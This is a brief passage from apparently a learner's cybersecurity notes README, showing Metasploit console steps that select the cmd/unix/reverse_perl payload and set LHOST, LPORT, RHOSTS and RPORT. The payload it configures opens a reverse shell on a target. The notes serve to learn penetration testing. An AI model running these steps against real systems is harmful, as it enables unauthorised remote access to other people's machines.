Izumi0XD/CYBER_SECURITY_NOTES/DAY_13/RAEDME.md

     show options

+• As we can see there is no LHOST is in this payload instead it is asking for CHOST which we dont know so we will be changing the payload by using the given command

+    show payloads
+    set  cmd/unix/reverse_perl

 now as we can see above we have to fill LPORT, LHOST, RHOSTS & RPORT by using :

     set RHOSTS >The Recivers Ip<